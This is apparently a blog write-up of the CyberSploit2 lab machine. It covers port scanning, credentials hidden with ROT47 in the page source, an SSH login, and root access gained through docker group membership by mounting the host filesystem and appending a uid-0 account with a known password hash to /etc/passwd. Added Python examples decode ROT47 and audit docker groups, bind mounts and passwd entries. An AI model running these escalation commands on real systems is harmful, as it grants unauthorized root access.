CyberSploit_2 target machine

Information gathering

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ sudo nmap --min-rate 10000 -p- 192.168.1.105

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:F3:2C:38 (Oracle VirtualBox virtual NIC)

Ports 22 and 80 are open.

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.1.105

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 ad:6d:15:e7:44:e9:7b:b8:59:09:19:5c:bd:d6:6b:10 (RSA)
| 256 d6:d5:b4:5d:8d:f9:5e:6f:3a:31:ad:81:80:34:9b:12 (ECDSA)
|_ 256 69:79:4f:8c:90:e9:43:6c:17:f7:31:e8:ff:87:05:31 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CyberSploit2
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
MAC Address: 08:00:27:F3:2C:38 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

The script found that the site does not block the risky TRACE method; I tried it, but found little of value. Let's look at the web page.

Then look at the page source.

The page source contains a comment reading ROT47, and looking at the page itself, one pair of values stands out as odd:

D92:=6?5C2 	4J36CDA=@:E`

Try ROT47.

Decoding both strings gives shailendra:cybersploit1.
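ROT47 is not encryption, only a fixed rotation of the 94 printable ASCII characters, so anything "hidden" with it in page source is readable by anyone who views the source. The decoder below is an added example written for this page, not code from the original post; it reproduces the decoding above on a constructed copy of the two tokens from the page (tab-separated, as they appeared) and shows that applying the rotation twice returns the input.

```python
"""ROT47 decoder for the obfuscated user/password pair found in the page source.
Added example; the sample pair is a constructed copy of the page's two tokens."""


def rot47(text):
    """Rotate every printable ASCII character (codes 33..126) by 47 positions.
    Characters outside that range (space, tab, newline) pass through unchanged.
    Because 47 is half of 94, applying the function twice restores the input."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            out.append(chr(33 + (code - 33 + 47) % 94))
        else:
            out.append(ch)
    return "".join(out)


def decode_pair(obfuscated):
    """Decode a whitespace-separated 'user pass' pair into the form user:pass."""
    parts = obfuscated.split()
    if len(parts) != 2:
        raise ValueError("expected exactly two whitespace-separated tokens")
    return ":".join(rot47(part) for part in parts)


# Constructed copy of the odd pair from the page (tab between the two tokens)
PAGE_PAIR = "D92:=6?5C2\t4J36CDA=@:E`"

if __name__ == "__main__":
    print(decode_pair(PAGE_PAIR))
```

The same function both encodes and decodes; there is no key, which is why a ROT47 comment in page source is effectively a plaintext credential disclosure.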

SSH login

Try logging in over SSH with these credentials.

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ ssh shailendra@192.168.1.105
The authenticity of host '192.168.1.105 (192.168.1.105)' can't be established.
ED25519 key fingerprint is SHA256:Ua5bYFU7jRE2PNF3w1hs2yrzHmyU7Q3FWj0xvMKZDro.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.105' (ED25519) to the list of known hosts.
shailendra@192.168.1.105's password:
Last login: Wed Jul 15 12:32:09 2020
[shailendra@localhost ~]$ whoami
shailendra
[shailendra@localhost ~]$ id
uid=1001(shailendra) gid=1001(shailendra) groups=1001(shailendra),991(docker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[shailendra@localhost ~]$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:f3:2c:38 brd ff:ff:ff:ff:ff:ff
inet 192.168.1.105/24 brd 192.168.1.255 scope global dynamic noprefixroute enp0s3
valid_lft 367sec preferred_lft 367sec
inet6 fe80::2128:7b5:cf42:2c22/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:da:26:3c:36 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
[shailendra@localhost ~]$ uname -a
Linux localhost.localdomain 4.18.0-193.6.3.el8_2.x86_64 #1 SMP Wed Jun 10 11:09:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
[shailendra@localhost ~]$ sudo -l
[sudo] password for shailendra:
Sorry, user shailendra may not run sudo on localhost.

We have a foothold; look at the files in the home directory.

[shailendra@localhost ~]$ ls -liah
total 20K
8409252 drwx------. 2 shailendra shailendra 99 Jul 15 2020 .
8896212 drwxr-xr-x. 4 root root 38 Jul 15 2020 ..
8409248 -rw-------. 1 shailendra shailendra 612 Jul 15 2020 .bash_history
9515438 -rw-r--r--. 1 shailendra shailendra 18 Nov 8 2019 .bash_logout
9515454 -rw-r--r--. 1 shailendra shailendra 141 Nov 8 2019 .bash_profile
9515455 -rw-r--r--. 1 shailendra shailendra 312 Nov 8 2019 .bashrc
8427883 -rw-rw-r--. 1 shailendra shailendra 7 Jul 15 2020 hint.txt

There is an unusual text file; view it.

[shailendra@localhost ~]$ cat hint.txt 
docker
[shailendra@localhost ~]$ cat .bash_history
ifconfig
whoami
pwd
cat /etc/shadow
su
cd
id
docker run -it /bin/bash busybox
docker run busybox -it /bin/bash
is
id
docker image ls
docker exec -i -t c7 /bin/bash
docker exec -i -t busybox /bin/bash
docker image ls
id
docker run -it busybox
su
docker iamge ls
ls
cd
pwd
ls
cd .
cd ..
pwd
ls
pwd
cat /etc/passwd
cat /etc/shadow
su
cd
pwd
ls
cd
su
cd
ls
pwd
ll
cd /home/
ls
cat docker > hint.txt
sudo cat docker > hint.txt
ls
cd shailendra
ll
echo docker > hint.txt
ls
cat hint.txt
docker -v
docker image ls
docker run busybox -it
docker run -i -t busybox
ls
cd
ls
cat hint.txt
ls
cd
pwd
ls
cd
su shailendra

Combining the bash history with hint.txt, we guess that privilege escalation has to go through docker.

Privilege escalation

Google whether an exploit exists for this version.

Look closely at the GitHub project flast101/docker-privesc: Privilege escalation in Docker (github.com).

Combining this with blog posts, we conclude: it is common for an ordinary user to be allowed to run docker, and in real environments a host directory is often mounted into a container to persist data (once a docker container is deleted, its data is gone too), while members of the docker group effectively have root privileges inside the containers they start. So we can mount the host's passwd file and add a new root user. There are two approaches here: the first only retrieves the flag file, the second obtains real root privileges.

Both face the same problem: without internet access, how do we obtain a docker image? (On this target the image list is empty.)

[shailendra@localhost tmp]$ docker image ls
REPOSITORY TAG IMAGE ID CREATED SIZE

First, pull an image on our own machine and export it.

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ docker pull busybox
Using default tag: latest
latest: Pulling from library/busybox
5cc84ad355aa: Pull complete
Digest: sha256:5acba83a746c7608ed544dc1533b87c737a0b0fb730301639a0179f9344b1678
Status: Downloaded newer image for busybox:latest
docker.io/library/busybox:latest

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ docker save -o busybox.tar busybox

┌──(kali㉿kali)-[~/Documents/CyberSploit2]
└─$ ls
busybox.tar docker-privesc.sh linpeas.sh pspy64

Upload busybox.tar to the target and load it.

[shailendra@localhost tmp]$ docker load -i busybox.tar
01fd6df81c8e: Loading layer [==================================================>] 1.459MB/1.459MB
Loaded image: busybox:latest
[shailendra@localhost tmp]$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
busybox latest beae173ccac6 21 months ago 1.24MB

Getting the flag file

docker run -v /:/mnt --rm -it busybox chroot /mnt sh

This runs an interactive container from the BusyBox image and executes chroot /mnt sh inside it. Because the host's / is bind-mounted at /mnt, the chroot makes the host's root filesystem the shell's root, so the shell inside the container sees and modifies the host's filesystem directly. When the shell exits, the container is deleted automatically because of the --rm option.

[shailendra@localhost tmp]$ docker run -v /:/mnt --rm -it busybox chroot /mnt sh
sh-4.4# whoami
root
sh-4.4# id
uid=0(root) gid=0(root) groups=0(root),10(wheel) context=system_u:system_r:spc_t:s0
sh-4.4# pwd
/
sh-4.4# uname -a
Linux e3da56f527e7 4.18.0-193.6.3.el8_2.x86_64 #1 SMP Wed Jun 10 11:09:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
sh-4.4# cd /root
sh-4.4# ls
anaconda-ks.cfg flag.txt get-docker.sh logs
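The two conditions this escalation depends on, a non-root user in the docker group and a container that bind-mounts the host root, are both straightforward to audit. The script below is an added example written for this page, not code from the original post or from the flast101/docker-privesc project. It runs over constructed sample data: an /etc/group excerpt using the gid 991 seen in the id output above, and a docker inspect-style JSON list shaped like the real command's output (Name, HostConfig.Privileged, Mounts with Type/Source/Destination). On a real host you would feed it the contents of /etc/group and the output of docker inspect for the running containers.

```python
"""Audit the two conditions the docker-group escalation relies on.
Added example; all input below is constructed, not captured from the target."""
import json

# Host paths that must never be bind-mounted into a container a non-root user controls
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/var/run/docker.sock")


def docker_group_members(group_text):
    """Return the supplementary members of the docker group from /etc/group text."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[0] == "docker":
            return [m for m in fields[3].strip().split(",") if m]
    return []


def _is_sensitive(source):
    """True if a bind-mount source is the host root or sits under a sensitive path."""
    src = "/" + source.strip("/")          # normalise "/mnt/" -> "/mnt", "/" -> "/"
    for path in SENSITIVE_HOST_PATHS:
        if src == path or (path != "/" and src.startswith(path + "/")):
            return True
    return False


def risky_mounts(inspect_json):
    """Scan docker inspect output (a JSON list of containers) for privileged
    containers and bind mounts of sensitive host paths."""
    findings = []
    for container in json.loads(inspect_json):
        name = container.get("Name", "").lstrip("/")
        if container.get("HostConfig", {}).get("Privileged"):
            findings.append({"container": name, "issue": "privileged"})
        for mount in container.get("Mounts", []):
            if mount.get("Type") == "bind" and _is_sensitive(mount.get("Source", "")):
                findings.append({"container": name, "issue": "sensitive bind mount",
                                 "source": mount["Source"],
                                 "destination": mount.get("Destination")})
    return findings


def report(group_text, inspect_json):
    """Human-readable finding lines for both checks."""
    lines = []
    for member in docker_group_members(group_text):
        if member != "root":
            lines.append(f"docker group member {member}: root-equivalent access to the daemon")
    for f in risky_mounts(inspect_json):
        where = f" ({f['source']} -> {f['destination']})" if "source" in f else ""
        lines.append(f"container {f['container']}: {f['issue']}{where}")
    return lines


# Constructed /etc/group excerpt (gid 991 matches the id output on the page)
SAMPLE_GROUP = """root:x:0:
wheel:x:10:
docker:x:991:shailendra
shailendra:x:1001:
"""

# Constructed docker inspect-style output: one container with the host root
# bind-mounted at /mnt, one harmless container using a named volume
SAMPLE_INSPECT = json.dumps([
    {"Name": "/flast101.github.io",
     "HostConfig": {"Privileged": False, "Binds": ["/:/mnt/"]},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt"}]},
    {"Name": "/web",
     "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "volume", "Name": "webdata",
                 "Source": "/var/lib/docker/volumes/webdata/_data",
                 "Destination": "/data"}]},
])

if __name__ == "__main__":
    for line in report(SAMPLE_GROUP, SAMPLE_INSPECT):
        print(line)
```

The group check is the one that matters most: once a user is in the docker group, every other control (sudo denial, file permissions on /root) is bypassed by the mount shown above, so the fix is to remove the membership rather than to police individual mounts.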

Getting root privileges

Unlike just retrieving the flag, obtaining root privileges requires modifying a sensitive file; here that file is passwd. First generate a password hash:

[shailendra@localhost tmp]$ openssl passwd -1 -salt evil newrootpass
$1$evil$eu2ySQGNgNghQm4ASTnKa.
[shailendra@localhost tmp]$ echo 'newroot:$1$evil$eu2ySQGNgNghQm4ASTnKa.:0:0:root:/root:/bin/bash' >new_account

Next, mount the host's root directory at the container's /mnt, run a shell in interactive mode, and append the contents of /mnt/tmp/new_account to /mnt/etc/passwd inside the container (which is the host's /etc/passwd).

[shailendra@localhost tmp]$ docker run -tid -v /:/mnt/ --name flast101.github.io busybox
fc616c718ce6cc4f11a7429399b264c4b8719bf56fef4e7848a7149ac8e555f0
[shailendra@localhost tmp]$ docker exec -ti flast101.github.io sh -c "cat /mnt/tmp/new_account >> /mnt/etc/passwd"
// cleanup
//docker rm -f flast101.github.io
//docker image rm busybox
//rm /tmp/new_account
[shailendra@localhost tmp]$ su newroot
Password:
[root@localhost tmp]# whoami
root
[root@localhost tmp]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost tmp]# uname -a
Linux localhost.localdomain 4.18.0-193.6.3.el8_2.x86_64 #1 SMP Wed Jun 10 11:09:32 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
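Appending a UID 0 entry with an inline hash leaves two traces in /etc/passwd that an integrity check can catch: a second account with uid 0, and a password field holding a hash instead of the x that defers to /etc/shadow. The checker below is an added example written for this page, not code from the original post; it parses a constructed passwd file that includes the newroot line generated above, reports both problems, and diffs the file against a constructed baseline snapshot to list appended accounts.

```python
"""Integrity checks for /etc/passwd: extra uid 0 accounts, inline hashes,
and entries appended since a known-good snapshot. Added example; the
passwd contents below are constructed."""

# Password-field values that legitimately appear in /etc/passwd when shadow is in use
SHADOWED_MARKERS = ("x", "*", "!", "!!")


def parse_passwd(text):
    """Parse passwd-format text into dicts; malformed lines are kept and flagged."""
    entries = []
    for raw in text.splitlines():
        if not raw.strip() or raw.startswith("#"):
            continue
        fields = raw.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            entries.append({"name": raw, "malformed": True})
            continue
        entries.append({"name": fields[0], "pw": fields[1], "uid": int(fields[2]),
                        "gid": int(fields[3]), "shell": fields[6], "malformed": False})
    return entries


def audit_passwd(text):
    """Return (account, problem) pairs for entries that should not exist."""
    issues = []
    for e in parse_passwd(text):
        if e["malformed"]:
            issues.append((e["name"], "malformed line"))
            continue
        if e["uid"] == 0 and e["name"] != "root":
            issues.append((e["name"], "uid 0 but not root"))
        if e["pw"] == "":
            issues.append((e["name"], "empty password field"))
        elif e["pw"] not in SHADOWED_MARKERS:
            issues.append((e["name"], "password hash stored in /etc/passwd"))
    return issues


def added_entries(baseline_text, current_text):
    """Account names present in the current file but absent from a known-good snapshot."""
    known = {e["name"] for e in parse_passwd(baseline_text) if not e["malformed"]}
    return [e["name"] for e in parse_passwd(current_text)
            if not e["malformed"] and e["name"] not in known]


# Constructed known-good snapshot (what a file-integrity tool would have stored)
BASELINE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
shailendra:x:1001:1001::/home/shailendra:/bin/bash
"""

# Constructed current file: the baseline plus the line appended in the walkthrough
CURRENT_PASSWD = BASELINE_PASSWD + "newroot:$1$evil$eu2ySQGNgNghQm4ASTnKa.:0:0:root:/root:/bin/bash\n"

if __name__ == "__main__":
    for account, problem in audit_passwd(CURRENT_PASSWD):
        print(f"{account}: {problem}")
    print("appended since baseline:", added_entries(BASELINE_PASSWD, CURRENT_PASSWD))
```

Note that this only detects the modification after the fact; because the write came from a process inside a container that the daemon started as root, host-side file permissions on /etc/passwd never applied, which is the point the walkthrough makes about docker group membership.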

If the target has internet access, simply run the docker-privesc.sh script from flast101/docker-privesc: Privilege escalation in Docker (github.com) directly.


https://i3eg1nner.github.io/2023/10/7f06b71ac96b.html
Author: I3eg1nner
Published on: October 18, 2023